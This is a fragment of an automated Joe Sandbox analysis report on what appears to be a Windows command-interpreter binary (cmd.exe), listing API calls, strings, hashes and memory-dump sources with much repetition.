• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1623332820-0

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4D9A
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF706EDC6DB), ref: 00007FF706EC58EF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4DBB
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EC4DCA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4DE0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF706EC4DEE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4E04
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC0589
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: SetConsoleMode.KERNELBASE ref: 00007FF706EC059E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC05AF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: GetConsoleMode.KERNELBASE ref: 00007FF706EC05C5
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC05EF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: GetConsoleMode.KERNELBASE ref: 00007FF706EC0605
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: _get_osfhandle.MSVCRT ref: 00007FF706EC0632
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC0580: SetConsoleMode.KERNELBASE ref: 00007FF706EC0647
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A28
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A66
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: memmove.MSVCRT(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706EC4AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EB8798), ref: 00007FF706EC4AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF706EC4E35), ref: 00007FF706EC55DA
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC5623
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC5667
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC56BE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC5554: RegQueryValueExW.KERNELBASE ref: 00007FF706EC5702
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4E35
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4E81
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4F69
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4F95
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FB0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FD8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC4FF8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC5037
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC504B
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC50DF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC50F2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC510F
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC5130
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC514A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF706EC5175
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: _get_osfhandle.MSVCRT ref: 00007FF706EC3584
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC359C
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35C3
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35D9
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC35ED
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF706EB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF706EC3602
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1049357271-3021193919
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b126f1702366f536cdc0290ce0484146886976d8b64aeb935690e35a9b1b7135
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf394d30a17139001fd3ca4171d3fdfeea46f289a8fe0fe81f1b572c7d274a87
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59C16C65A08B46D6EA00BB11EC351BBF7A1FF89BA4FC48134D90E473A5DF3CA4468360

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
• String ID: :
• API String ID: 1809961153-336475711
• Opcode ID: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
• Instruction ID: d28b187de5df886c849393368fe11504ded461ab225ca9f976165d27fccd3d44
• Opcode Fuzzy Hash: 1f2595f9a0539a2f953c013a61cae0d311abf23469fc557ca2973e8bb1f3dfa2
• Instruction Fuzzy Hash: C1D14E22A0CB8585EA60EB15EC642BBF7A1FF84760F848136DA4E437A4DF3CE546C710

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
• String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
• API String ID: 2622545777-4197029667
• Opcode ID: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
• Instruction ID: 82393b5b22ca6b85eb5985e178a3d1b42226ee55b58f3f127dba0449f8d9af95
• Opcode Fuzzy Hash: bc67b4ac6c9ae8dc8aa03d7640ce546299fc8a55271f7ee994edb6499b34c01a
• Instruction Fuzzy Hash: BD915166B09B86C5EE24AB54DC706FAA3A1FF48B94FC44135D90E47695EF3CE50AC320

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID: CMD.EXE
• API String ID: 1606018815-3025314500
• Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
• Instruction ID: aefa3570ffdd2f50702d24f757001fda33ec732f0e566585414b1663ffdb4bbb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C941FE39A09B42CBE7146B14EC641BAFBA0FF89B55FC5D179C90E473A0DF3DA4058660

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: ConsoleTitlewcschr
• String ID: /$:
• API String ID: 2364928044-4222935259
• Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
• Instruction ID: cdef8811c7da3924b11e5a175cac4be91fba1452734177d3531fa0845580e7f0
• Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
• Instruction Fuzzy Hash: ADC19E61A1C74281FA64BB25DC242BBE2A1FF91F94FE46231DA1E472D5DF7CE8458320

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
• String ID:
• API String ID: 4291973834-0
• Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
• Instruction ID: 43c635820e7093ad927d14dc742e0d53afb63bf360faaca3e0890e8d8404c32f
• Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
• Instruction Fuzzy Hash: AA412839E08B4786FB50BB10EE6027BABA0BF54368FC41436D91D476A4DF7CE8458764


APIs
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
• String ID:
• API String ID: 1826527819-0
• Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
• Instruction ID: 23256dfd2f732df175e6b73b052b73006fca6669f12a3d168bc46ea9cf5c2c03
• Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
• Instruction Fuzzy Hash: 42012D35908B82CAE6047B55AC641BAFA61FF8A759FC45174D54F07396DF3C90448B60
APIs
  • Part of subcall function 00007FF706EC1EA0: wcschr.MSVCRT(?,?,?,00007FF706EB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF706EE0D54), ref: 00007FF706EC1EB3
• SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF706EB92AC), ref: 00007FF706EC30CA
• SetErrorMode.KERNELBASE ref: 00007FF706EC30DD
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF706EC30F6
• SetErrorMode.KERNELBASE ref: 00007FF706EC3106
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: ErrorMode$FullNamePathwcschr
• String ID:
• API String ID: 1464828906-0
• Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
• Instruction ID: 5c0fd1969c73b4d39aa4be34888137298cba3c6158d7376fdb3c4dea73e1fa2a
• Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
• Instruction Fuzzy Hash: 6031D122A0875286E724AF19AC2407FF661FF45BA4FD59235DA5A433D0EF7DE84A8310
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: memset
• String ID: onecore\base\cmd\maxpathawarestring.cpp
• API String ID: 2221118986-3416068913
• Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
• Instruction ID: d98343f8a50b510becc2b8cc51fbdae8f634d85e983456aeaa23f385d89a4afb
• Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
• Instruction Fuzzy Hash: 3911C621B0874681EB50EB55AD642BB9290BF84FE4FA85331DE6E4B3D5DF2CD0814320
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 2$COMSPEC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1764819092-1738800741
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4254246844-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2643372051-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _get_osfhandle$ConsoleMode
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1591002910-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
